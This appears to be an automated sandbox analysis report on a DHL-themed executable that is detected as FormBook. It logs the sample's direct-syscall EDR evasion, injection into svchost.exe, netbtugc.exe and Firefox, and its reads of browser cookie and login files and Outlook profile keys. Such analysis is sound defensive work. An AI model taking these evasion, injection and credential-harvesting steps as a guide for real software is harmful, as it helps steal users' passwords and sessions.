            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]2_2_03704A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]2_2_03668A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]2_2_036BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]2_2_036B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]2_2_03704940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]2_2_036B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]2_2_036C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]2_2_036BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]2_2_036BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]2_2_036C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]2_2_0363A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]2_2_036649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]2_2_036FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]2_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]2_2_036309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]2_2_036B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]2_2_036BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]2_2_036C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]2_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]2_2_03660854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]2_2_03634859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]2_2_03652835
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00090B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00090B62
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00062622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00062622
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0005083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0005083F
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000509D5 SetUnhandledExceptionFilter,0_2_000509D5
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00050C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00050C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtQueryValueKey: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtOpenKeyEx: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 3116Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BA7008Jump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00091201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00091201
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00072BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00072BA5
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009B226 SendInput,keybd_event,0_2_0009B226
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_000B22DA
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rDHL8350232025-2.exe"Jump to behavior
            Source: C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00090B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00090B62
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00091663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00091663
            Source: rDHL8350232025-2.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000002.4462026429.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2075041775.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000000.2221272960.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: rDHL8350232025-2.exe, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000002.4462026429.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2075041775.00000000016D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000002.4462026429.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2075041775.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000000.2221272960.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000002.4462026429.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2075041775.00000000016D1000.00000002.00000001.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000000.2221272960.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_00050698 cpuid 0_2_00050698
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_000A8195
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0008D27A GetUserNameW,0_2_0008D27A
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0006B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0006B952
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: rDHL8350232025-2.exeBinary or memory string: WIN_81
            Source: rDHL8350232025-2.exeBinary or memory string: WIN_XP
